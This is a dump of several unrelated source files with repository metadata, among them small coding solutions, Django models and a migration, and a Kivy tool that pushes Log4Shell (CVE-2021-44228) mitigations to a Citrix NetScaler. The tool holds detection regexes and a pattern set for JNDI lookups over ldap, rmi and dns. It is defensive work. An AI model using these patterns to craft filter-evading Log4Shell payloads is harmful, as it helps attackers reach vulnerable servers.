] | null | null | null | weather/distanceCheck.py | huberf/PAL | 5e7d5502ad969c6ae362c292b939b1fe768678d6 | [
"MIT"
] | null | null | null | import forecaster as w
myWeather = w.Weather(os.environ['DARK_SKY_KEY'])
distance = myWeather.stormDistance('35.1391218,-85.99808539999998')
if(distance < 5):
print "Storm nearby. Batten the hatches."
else:
print "No storm nearby, but keep your eyes open."
| 32.625 | 67 | 0.750958 | 38 | 261 | 5.105263 | 0.842105 | 0.113402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114035 | 0.126437 | 261 | 7 | 68 | 37.285714 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0.440613 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.142857 | null | null | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
44bef23fdc95fafb1ebb9c7cc9bc406442beb8e7 | 110 | py | Python | DSA Learning Series/Easy Problems to Get Started/Triangle With Angle (ANGTRICH)/triangle_with_angle.py | Ekalaivanpj/codechef | 0adabcabe1dde60be5ee822878ce01057a351fbb | [
"Apache-2.0"
] | 4 | 2021-05-20T08:21:36.000Z | 2022-03-26T03:56:20.000Z | DSA Learning Series/Easy Problems to Get Started/Triangle With Angle (ANGTRICH)/triangle_with_angle.py | Ekalaivanpj/codechef | 0adabcabe1dde60be5ee822878ce01057a351fbb | [
"Apache-2.0"
] | 5 | 2021-03-30T05:07:16.000Z | 2021-05-02T04:09:39.000Z | DSA Learning Series/Easy Problems to Get Started/Triangle With Angle (ANGTRICH)/triangle_with_angle.py | Ekalaivanpj/codechef | 0adabcabe1dde60be5ee822878ce01057a351fbb | [
"Apache-2.0"
] | 3 | 2021-03-27T12:20:09.000Z | 2021-10-05T16:53:16.000Z | lst=list(map(int, input().split()))
if sum(lst)==180 and 0 not in lst:
print('YES')
else:
print('NO')
| 18.333333 | 35 | 0.590909 | 20 | 110 | 3.25 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044444 | 0.181818 | 110 | 5 | 36 | 22 | 0.677778 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
44c197b2e3a97430b3af4a8dd1cf13513d1a5653 | 292 | py | Python | 53. Maximum Subarray.py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | 4 | 2020-11-17T05:24:24.000Z | 2021-06-14T21:01:45.000Z | 53. Maximum Subarray.py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | null | null | null | 53. Maximum Subarray.py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | null | null | null | class Solution:
def maxSubArray(self, nums: List[int]) -> int:
current_max=nums[0]
global_max=nums[0]
for i in range(1,len(nums)):
current_max=max(nums[i],current_max+nums[i])
global_max=max(current_max,global_max)
return global_max | 36.5 | 56 | 0.616438 | 43 | 292 | 4 | 0.44186 | 0.232558 | 0.162791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013953 | 0.263699 | 292 | 8 | 57 | 36.5 | 0.786047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
44e0a725a63a8c55f7eb9e145b07cc5fbf3064a8 | 223 | py | Python | pychemia/io/__init__.py | petavazohi/PyChemia | e779389418771c25c830aed360773c63bb069372 | [
"MIT"
] | 67 | 2015-01-31T07:44:55.000Z | 2022-03-21T21:43:34.000Z | pychemia/io/__init__.py | petavazohi/PyChemia | e779389418771c25c830aed360773c63bb069372 | [
"MIT"
] | 13 | 2016-06-03T19:07:51.000Z | 2022-03-31T04:20:40.000Z | pychemia/io/__init__.py | petavazohi/PyChemia | e779389418771c25c830aed360773c63bb069372 | [
"MIT"
] | 37 | 2015-01-22T15:37:23.000Z | 2022-03-21T15:38:10.000Z | """
Routines to import and export atomic structures.
Currently supported are *ASCII*, *CIF* and *XYZ*
"""
from . import cif
from . import ascii
from . import xyz
# __all__ = filter(lambda s: not s.startswith('_'), dir())
| 20.272727 | 58 | 0.695067 | 31 | 223 | 4.83871 | 0.677419 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170404 | 223 | 10 | 59 | 22.3 | 0.810811 | 0.695067 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
44f6a91fa13949d563a870cd5ef247e7869f85bb | 2,234 | py | Python | db/food_database/models.py | IBPA/FoodAtlas | 0a431f0a391adaa8984b380f3f6f7189f27b9311 | [
"Apache-2.0"
] | 1 | 2022-02-07T10:04:35.000Z | 2022-02-07T10:04:35.000Z | db/food_database/models.py | IBPA/FoodAtlas | 0a431f0a391adaa8984b380f3f6f7189f27b9311 | [
"Apache-2.0"
] | null | null | null | db/food_database/models.py | IBPA/FoodAtlas | 0a431f0a391adaa8984b380f3f6f7189f27b9311 | [
"Apache-2.0"
] | null | null | null | from django.db import models
class Food(models.Model):
foodon_id = models.CharField(max_length=100)
foodb_id = models.CharField(max_length=100)
name = models.CharField(max_length=100)
synonyms = models.CharField(max_length=100)
# Create your models here.
class Chemical(models.Model):
foodb_id = models.CharField(max_length=100)
chebi_id = models.CharField(max_length=100)
name = models.CharField(max_length=100)
synonyms = models.CharField(max_length=100)
class FoodPart(models.Model):
name = models.CharField(max_length=100)
plant_ontology_id = models.CharField(max_length=100)
class Units(models.Model):
name = models.CharField(max_length=100)
# units_ontology_id
class Article(models.Model):
pmid = models.TextField()
doi = models.TextField()
class FoodChemicalRelationshipEvidence(models.Model):
text = models.TextField() # premise
article = models.ForeignKey(Article, on_delete=models.DO_NOTHING)
class FoodChemicalRelationship(models.Model):
food = models.ForeignKey(Food, on_delete=models.DO_NOTHING)
chemical = models.ForeignKey(Chemical, on_delete=models.DO_NOTHING)
# food_part = models.ForeignKey(FoodPart, on_delete=models.DO_NOTHING)
concentration = models.FloatField(null=True)
# units = models.ForeignKey(Units, on_delete=models.DO_NOTHING)
# evidences = models.ManyToManyField(FoodChemicalRelationshipEvidence)
# label = (
# models.TextField()
# ) # human annotated label, entailed or not entailed
# prediction = (
# models.FloatField()
# ) # model predicted probability of entailment
# class FoodChemicalRelationshipPrediction(models.Model):
# proba_entails = models.FloatField()
# relationship = models.ForeignKey(FoodChemicalRelationship, on_delete=models.DO_NOTHING)
# evidence = models.ForeignKey(FoodChemicalRelationshipEvidence, on_delete=models.DO_NOTHING)
# class FoodChemicalRelationshipAnnotation(models.Model):
# label = models.CharField(max_length=100)
# relationship = models.ForeignKey(FoodChemicalRelationship, on_delete=models.DO_NOTHING)
# evidence = models.ForeignKey(FoodChemicalRelationshipEvidence, on_delete=models.DO_NOTHING)
| 33.848485 | 97 | 0.753805 | 249 | 2,234 | 6.60241 | 0.253012 | 0.109489 | 0.131387 | 0.175182 | 0.511557 | 0.439173 | 0.377737 | 0.354015 | 0.30292 | 0.30292 | 0 | 0.018898 | 0.147269 | 2,234 | 65 | 98 | 34.369231 | 0.844094 | 0.444494 | 0 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
7808aa807482efcb2b33550066adb7bf10e5f879 | 20,567 | py | Python | main.py | LooseDevGoose/Turbo_Log4J_ADC | dd6395643aa0f23a42f8e4309ac62114ca3adfcd | [
"Unlicense"
] | null | null | null | main.py | LooseDevGoose/Turbo_Log4J_ADC | dd6395643aa0f23a42f8e4309ac62114ca3adfcd | [
"Unlicense"
] | 4 | 2021-12-13T11:31:12.000Z | 2021-12-14T15:00:37.000Z | main.py | LooseDevGoose/Turbo_Log4J_ADC | dd6395643aa0f23a42f8e4309ac62114ca3adfcd | [
"Unlicense"
] | null | null | null | #Screen functionality gets sent to different files e.g. ADCTK_ReportFunctionality or ADCTK_SecurityScan
#When functionality is done, data gets fed back to the screen and shown to user
#Please mind that the draw time of the screen impacts what is shown, as it does not update dynamically
###############
####Imports####
###############
#Import Kivy libraries
from kivymd.app import MDApp
from kivy.lang import Builder
from kivy.uix.screenmanager import ScreenManager,Screen
from kivy.core.window import Window
#Import List Libaries
from kivymd.uix.list import IRightBodyTouch, OneLineAvatarIconListItem
from kivymd.uix.selectioncontrol import MDCheckbox
from kivy.properties import StringProperty
#Libraries from Netscaler Nitro API
from nssrc.com.citrix.netscaler.nitro.service.nitro_service import nitro_service
from nssrc.com.citrix.netscaler.nitro.resource.config.audit import auditsyslogparams
from nssrc.com.citrix.netscaler.nitro.resource.config.audit import auditnslogparams
from nssrc.com.citrix.netscaler.nitro.resource.config.audit import auditmessageaction
from nssrc.com.citrix.netscaler.nitro.resource.config.responder import responderpolicy
from nssrc.com.citrix.netscaler.nitro.resource.config.responder import responderglobal_responderpolicy_binding
from nssrc.com.citrix.netscaler.nitro.resource.config.appfw import appfwpolicy
from nssrc.com.citrix.netscaler.nitro.resource.config.appfw import appfwglobal_appfwpolicy_binding
from nssrc.com.citrix.netscaler.nitro.resource.config.policy import policypatset
from nssrc.com.citrix.netscaler.nitro.resource.config.policy import policypatset_pattern_binding
#Window Manager, managed and creates windows via KV file
class WindowManager(ScreenManager):
pass
#Define CustomListItem for SSL login option
class ListItemWithCheckbox(OneLineAvatarIconListItem):
'''Custom list item.'''
icon = StringProperty("security-network")
class RightCheckbox(IRightBodyTouch, MDCheckbox):
'''Custom right container.'''
class LoginScreen(Screen):
def submitinfo(self):
global nsip
global nsusername
nsip = self.ids.ns_ip.text
nsusername = self.ids.ns_username.text
nspassword = self.ids.ns_password.text
try:
global ns_session
if self.ids.https_box.ids.cb.active == True:
protocol = "https"
else:
protocol = "http"
ns_session = nitro_service(f"{nsip}", f"{protocol}")
ns_session.login(f"{nsusername}", f"{nspassword}", 3600)
return (ns_session.isLogin())
except Exception as error:
errormessage = ("Error: " + str(error.args))
self.ids.error_label_login.text = errormessage
def cleardata(self):
self.ids.ns_ip.text = ("")
self.ids.ns_username.text = ("")
self.ids.ns_password.text = ("")
class MainMenu(Screen):
def MadsRegex(self):
try:
#Set audit syslogparams to YES
syslog_params = auditsyslogparams.auditsyslogparams()
syslog_params.userdefinedauditlog = "YES"
syslog_params.update(ns_session, syslog_params)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
#Set audit nslogparams to YES
nslog_params = auditnslogparams.auditnslogparams()
nslog_params.userdefinedauditlog = "YES"
nslog_params.update(ns_session, nslog_params)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
#Create Audit Message action #1
audit_message_action1 = auditmessageaction.auditmessageaction()
audit_message_action1.name = "Log4Shell_URL_log"
audit_message_action1.loglevel = "ALERT"
audit_message_action1.logtonewnslog = "YES"
audit_message_action1.stringbuilderexpr = "\"Log4Shell cve-2021-44228 URL match - Client IP=\"+ CLIENT.IP.SRC + \"; REQ Host=\"+ HTTP.REQ.HOSTNAME+ \"; REQ URL=\"+ HTTP.REQ.URL.DECODE_USING_TEXT_MODE + \" ; REQ HEADERS=\"+ HTTP.REQ.FULL_HEADER.DECODE_USING_TEXT_MODE"
audit_message_action1.add(ns_session, audit_message_action1)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
audit_message_action2 = auditmessageaction.auditmessageaction()
audit_message_action2.name = "Log4Shell_Headers_log"
audit_message_action2.loglevel = "ALERT"
audit_message_action2.logtonewnslog = "YES"
audit_message_action2.stringbuilderexpr = "\"Log4Shell cve-2021-44228 HEADER match - Client IP=\"+ CLIENT.IP.SRC + \"; REQ Host=\"+ HTTP.REQ.HOSTNAME+ \"; REQ URL=\"+ HTTP.REQ.URL.DECODE_USING_TEXT_MODE + \" ; REQ HEADERS=\"+ HTTP.REQ.FULL_HEADER.DECODE_USING_TEXT_MODE"
audit_message_action2.add(ns_session, audit_message_action2)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
#Create Responder policy GLOVR_RSP_POL_Log4Shell_Headers
responderpolicy1 = responderpolicy.responderpolicy()
responderpolicy1.name = "GLOVR_RSP_POL_Log4Shell_Headers"
responderpolicy1.action = "DROP"
responderpolicy1.rule = "HTTP.REQ.FULL_HEADER.DECODE_USING_TEXT_MODE.REGEX_MATCH(re#\\$\\{+\?(.*\?:|.*\?:.*-)\?[jJlLnNdDiIaApPsSmMrRoOhH}:]*//#)"
responderpolicy1.logaction = "Log4Shell_Headers_log"
responderpolicy1.add(ns_session, responderpolicy1)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
# Create Responder policy GLOVR_RSP_POL_Log4Shell_Headers
responderpolicy2 = responderpolicy.responderpolicy()
responderpolicy2.name = "GLOVR_RSP_POL_Log4Shell_URL"
responderpolicy2.action = "DROP"
responderpolicy2.rule = "HTTP.REQ.URL.PATH_AND_QUERY.DECODE_USING_TEXT_MODE.REGEX_MATCH(re#\\$\\{+\?(.*\?:|.*\?:.*-)\?[jJlLnNdDiIaApPsSmMrRoOhH}:]*//#)"
responderpolicy2.logaction = "Log4Shell_URL_log"
responderpolicy2.add(ns_session, responderpolicy2)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
bind_responderpolicy1_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy1_global.policyname = "GLOVR_RSP_POL_Log4Shell_Headers"
bind_responderpolicy1_global.priority = "90"
bind_responderpolicy1_global.type = "REQ_OVERRIDE"
bind_responderpolicy1_global.add(ns_session, bind_responderpolicy1_global)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
try:
bind_responderpolicy2_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy2_global.policyname = "GLOVR_RSP_POL_Log4Shell_URL"
bind_responderpolicy2_global.priority = "100"
bind_responderpolicy2_global.type = "REQ_OVERRIDE"
bind_responderpolicy2_global.add(ns_session, bind_responderpolicy2_global)
except Exception as error:
errormessage = ("Error: " + str(error.args))
print(errormessage)
def MadsRegexPurge(self):
i = 0
while i < 6:
i+= 1
try:
# Set audit syslogparams to No
syslog_params = auditsyslogparams.auditsyslogparams()
syslog_params.userdefinedauditlog = "NO"
syslog_params.update(ns_session, syslog_params)
except Exception as error:
errormessage = ("Error1: " + str(error.args))
print(errormessage)
try:
# Set audit nslogparams to No
nslog_params = auditnslogparams.auditnslogparams()
nslog_params.userdefinedauditlog = "NO"
nslog_params.update(ns_session, nslog_params)
except Exception as error:
errormessage = ("Error2: " + str(error.args))
print(errormessage)
#Remove Global Bindings
try:
bind_responderpolicy1_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy1_global.policyname = "GLOVR_RSP_POL_Log4Shell_Headers"
if bind_responderpolicy1_global.globalbindtype != "":
bind_responderpolicy1_global.globalbindtype = ""
bind_responderpolicy1_global.delete(ns_session, bind_responderpolicy1_global)
except Exception as error:
errormessage = ("Error3: global policies1 " + str(error.args))
print(errormessage)
try:
bind_responderpolicy2_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy2_global.policyname = "GLOVR_RSP_POL_Log4Shell_URL"
if bind_responderpolicy2_global.globalbindtype != '':
print(bind_responderpolicy2_global.globalbindtype)
bind_responderpolicy2_global.globalbindtype = ''
bind_responderpolicy2_global.delete(ns_session, bind_responderpolicy2_global)
except Exception as error:
errormessage = ("Error4: global policies2 " + str(error.args))
print(errormessage)
try:
audit_message_action1 = auditmessageaction.auditmessageaction()
audit_message_action1.name = "Log4Shell_URL_log"
audit_message_action1.unset = "Log4Shell_URL_log"
audit_message_action1.delete(ns_session, audit_message_action1)
except Exception as error:
errormessage = ("Error5: " + str(error.args))
print(errormessage)
try:
audit_message_action2 = auditmessageaction.auditmessageaction()
audit_message_action2.name = "Log4Shell_Headers_log"
audit_message_action2.unset = "Log4Shell_Headers_log"
audit_message_action2.delete(ns_session, audit_message_action2)
except Exception as error:
errormessage = ("Error6: " + str(error.args))
print(errormessage)
#Remove Responder polcies but remove logaction first
try:
responderpolicy1 = responderpolicy.responderpolicy()
responderpolicy1.name = "GLOVR_RSP_POL_Log4Shell_Headers"
responderpolicy1.logaction = "None"
responderpolicy1.unset = "GLOVR_RSP_POL_Log4Shell_Headers"
responderpolicy1.delete(ns_session, responderpolicy1)
except Exception as error:
errormessage = ("Error7: " + str(error.args))
print(errormessage)
try:
responderpolicy2 = responderpolicy.responderpolicy()
responderpolicy2.name = "GLOVR_RSP_POL_Log4Shell_URL"
responderpolicy2.logaction = "None"
responderpolicy2.unset = "GLOVR_RSP_POL_Log4Shell_URL"
responderpolicy2.delete(ns_session, responderpolicy2)
except Exception as error:
errormessage = ("Error8: " + str(error.args))
print(errormessage)
def Enable_IP_Reputation(self):
features_to_be_enabled = ['Rep', 'appfw']
ns_session.enable_features(features_to_be_enabled)
try:
custom_appfw_pol = appfwpolicy.appfwpolicy()
custom_appfw_pol.name = "Turbo_ADC_Custom_APPFW"
custom_appfw_pol.profilename = "APPFW_BLOCK"
custom_appfw_pol.rule = "CLIENT.IP.SRC.IPREP_IS_MALICIOUS"
custom_appfw_pol.add(ns_session, custom_appfw_pol)
except Exception as error:
errormessage = ("Error appfw1: " + str(error.args))
try:
bind_appfw_global = appfwglobal_appfwpolicy_binding.appfwglobal_appfwpolicy_binding()
bind_appfw_global.policyname = "Turbo_ADC_Custom_APPFW"
bind_appfw_global.state = "ENABLED"
bind_appfw_global.type = "REQ_OVERRIDE"
bind_appfw_global.priority = "110"
bind_appfw_global.add(ns_session, bind_appfw_global)
except Exception as error:
errormessage = ("Error appfw2: " + str(error.args))
print(errormessage)
def Disable_IP_Reputation(self):
#features_to_be_disabled = ['Rep']
#ns_session.disable_features(features_to_be_disabled)
try:
bind_appfw_global = appfwglobal_appfwpolicy_binding.appfwglobal_appfwpolicy_binding()
bind_appfw_global.policyname = "Turbo_ADC_Custom_APPFW"
bind_appfw_global.state = "DISABLED"
bind_appfw_global.delete(ns_session, bind_appfw_global)
except Exception as error:
errormessage = ("Error appfw2: " + str(error.args))
print(errormessage)
try:
custom_appfw_pol = appfwpolicy.appfwpolicy()
custom_appfw_pol.name = "Turbo_ADC_Custom_APPFW"
custom_appfw_pol.delete(ns_session, custom_appfw_pol)
except Exception as error:
errormessage = ("Error appfw1: " + str(error.args))
def Citrix_Responder_Enable(self):
try:
#Creates Policy for Patset per https://www.citrix.com/blogs/2021/12/13/guidance-for-reducing-apache-log4j-security-vulnerability-risk-with-citrix-waf/
policy = policypatset.policypatset()
policy.name = "patset_cve_2021_44228"
policy.add(ns_session, policy)
print("done1")
except Exception as error:
errormessage = ("Error citrix1: " + str(error.args))
print(errormessage)
try:
patternset_protocol = policypatset_pattern_binding.policypatset_pattern_binding()
patternset_protocol.name = "patset_cve_2021_44228"
patternset_protocol.String = "ldap"
patternset_protocol.add(ns_session, patternset_protocol)
patternset_protocol.String = 'http'
patternset_protocol.add(ns_session, patternset_protocol)
patternset_protocol.String = 'https'
patternset_protocol.add(ns_session, patternset_protocol)
patternset_protocol.String = 'ldaps'
patternset_protocol.add(ns_session, patternset_protocol)
patternset_protocol.String = 'rmi'
patternset_protocol.add(ns_session, patternset_protocol)
patternset_protocol.String = 'dns'
patternset_protocol.add(ns_session, patternset_protocol)
except Exception as error:
errormessage = ("Error citrix2: " + str(error.args))
print(errormessage)
try:
#Create Responder policy based on patsets
responder = responderpolicy.responderpolicy()
responder.name = 'mitigate_cve_2021_44228'
responder.rule = "HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR(\"${\").BEFORE_STR(\"}\").CONTAINS(\"${\") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS(\"${: }/+\").AFTER_STR(\"jndi\").CONTAINS_ANY(\"patset_cve_2021_44228\") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR(\"${\").BEFORE_STR(\"}\").CONTAINS(\"${\") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE. SET_TEXT_MODE(IGNORECASE).STRIP_CHARS(\"${: }/+\").AFTER_STR(\"jndi\").CONTAINS_ANY(\"patset_cve_2021_44228\")"
responder.action = "DROP"
responder.add(ns_session, responder)
except Exception as error:
errormessage = ("Error citrix3: " + str(error.args))
print(errormessage)
try:
#Bind Responder policy globally
bind_responderpolicy_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy_global.policyname = "mitigate_cve_2021_44228"
bind_responderpolicy_global.priority = "120"
bind_responderpolicy_global.type = "REQ_OVERRIDE"
bind_responderpolicy_global.add(ns_session, bind_responderpolicy_global)
except Exception as error:
errormessage = ("Error citrix4: " + str(error.args))
print(errormessage)
def Citrix_Responder_Purge(self):
try:
#Bind Responder policy globally
bind_responderpolicy_global = responderglobal_responderpolicy_binding.responderglobal_responderpolicy_binding()
bind_responderpolicy_global.policyname = "mitigate_cve_2021_44228"
if bind_responderpolicy_global.globalbindtype != '':
print(bind_responderpolicy_global.globalbindtype)
bind_responderpolicy_global.globalbindtype = ''
bind_responderpolicy_global.delete(ns_session, bind_responderpolicy_global)
except Exception as error:
errormessage = ("Error citrix4: " + str(error.args))
print(errormessage)
try:
#Create Responder policy based on patsets
responder = responderpolicy.responderpolicy()
responder.name = 'mitigate_cve_2021_44228'
responder.delete(ns_session, responder)
except Exception as error:
errormessage = ("Error citrix4: " + str(error.args))
print(errormessage)
try:
patternset_protocol = policypatset_pattern_binding.policypatset_pattern_binding()
patternset_protocol.name = "patset_cve_2021_44228"
patternset_protocol.String = "ldap"
patternset_protocol.delete(ns_session, patternset_protocol)
patternset_protocol.String = 'http'
patternset_protocol.delete(ns_session, patternset_protocol)
patternset_protocol.String = 'https'
patternset_protocol.delete(ns_session, patternset_protocol)
patternset_protocol.String = 'ldaps'
patternset_protocol.delete(ns_session, patternset_protocol)
patternset_protocol.String = 'rmi'
patternset_protocol.delete(ns_session, patternset_protocol)
patternset_protocol.String = 'dns'
patternset_protocol.delete(ns_session, patternset_protocol)
except Exception as error:
errormessage = ("Error citrix2: " + str(error.args))
print(errormessage)
try:
#Creates Policy for Patset per https://www.citrix.com/blogs/2021/12/13/guidance-for-reducing-apache-log4j-security-vulnerability-risk-with-citrix-waf/
policy = policypatset.policypatset()
policy.name = "patset_cve_2021_44228"
policy.delete(ns_session, policy)
except Exception as error:
errormessage = ("Error citrix1: " + str(error.args))
print(errormessage)
def Save_NS_Config(self):
ns_session.save_config()
def Logout_NS_Session(self):
ns_session.logout()
#Build Class for Login Screen inc. Theme data
class Log4j_ADC(MDApp):
def build(self):
#Window.size = (1200, 800)
self.theme_cls.theme_style = "Dark"
self.theme_cls.primary_palette = "Blue"
self.theme_cls.hue = 700
self.title = "Turbo_Log4j_ADC 1.1"
self.icon = "Images/Logo.png"
Builder.load_file('Log4j_ADC.kv')
def change_screen(self, screen: str):
self.root.current = screen
Log4j_ADC().run()
| 45.908482 | 647 | 0.648904 | 2,026 | 20,567 | 6.319348 | 0.155972 | 0.033039 | 0.038507 | 0.049832 | 0.755995 | 0.721472 | 0.691166 | 0.640162 | 0.614622 | 0.603687 | 0 | 0.019153 | 0.266349 | 20,567 | 447 | 648 | 46.011186 | 0.829346 | 0.069091 | 0 | 0.559271 | 0 | 0.00304 | 0.128443 | 0.077807 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036474 | false | 0.012158 | 0.051672 | 0 | 0.112462 | 0.088146 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7814e99f909d6640a1a4c8aab5785638dbac2bfc | 379 | py | Python | app/forms.py | dairvin9/AnimalStyle | 33d322a5f5c839091ee58c04cacfc5c894dc168c | [
"CC-BY-3.0"
] | null | null | null | app/forms.py | dairvin9/AnimalStyle | 33d322a5f5c839091ee58c04cacfc5c894dc168c | [
"CC-BY-3.0"
] | null | null | null | app/forms.py | dairvin9/AnimalStyle | 33d322a5f5c839091ee58c04cacfc5c894dc168c | [
"CC-BY-3.0"
] | null | null | null | from flask_wtf import Form
from wtforms import StringField, BooleanField, ValidationError
from wtforms.validators import DataRequired
from wtforms.widgets import TextArea
# validators.length(max=10)]
class CommentForm(Form):
username = StringField('username', validators=[DataRequired()])
comment = StringField('comment', validators=[DataRequired()],widget=TextArea()) | 34.454545 | 83 | 0.791557 | 40 | 379 | 7.475 | 0.525 | 0.110368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0059 | 0.105541 | 379 | 11 | 83 | 34.454545 | 0.876106 | 0.068602 | 0 | 0 | 0 | 0 | 0.042614 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.571429 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
781b5029a1b0c8a541cf86d413ebce20c9e3b485 | 1,330 | py | Python | server/migrations/0043_auto_20160809_2122.py | lfaraone/sal | d0dff90cebcbc87f18c2c6957264f21566d52000 | [
"Apache-2.0"
] | 2 | 2019-11-01T20:50:35.000Z | 2021-01-13T22:02:55.000Z | server/migrations/0043_auto_20160809_2122.py | grahamgilbert/sal | d247ec1ea8855e65e5855b0dd63eae93b40f86ca | [
"Apache-2.0"
] | null | null | null | server/migrations/0043_auto_20160809_2122.py | grahamgilbert/sal | d247ec1ea8855e65e5855b0dd63eae93b40f86ca | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-08-10 04:22
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('server', '0042_auto_20160808_1021'),
]
operations = [
migrations.RemoveField(
model_name='osquerycolumn',
name='osquery_result',
),
migrations.RemoveField(
model_name='osqueryresult',
name='machine',
),
migrations.AlterField(
model_name='condition',
name='condition_data',
field=models.TextField(db_index=True),
),
migrations.AlterField(
model_name='condition',
name='condition_name',
field=models.CharField(db_index=True, max_length=255),
),
migrations.AlterField(
model_name='fact',
name='fact_data',
field=models.TextField(db_index=True),
),
migrations.AlterField(
model_name='fact',
name='fact_name',
field=models.TextField(db_index=True),
),
migrations.DeleteModel(
name='OSQueryColumn',
),
migrations.DeleteModel(
name='OSQueryResult',
),
]
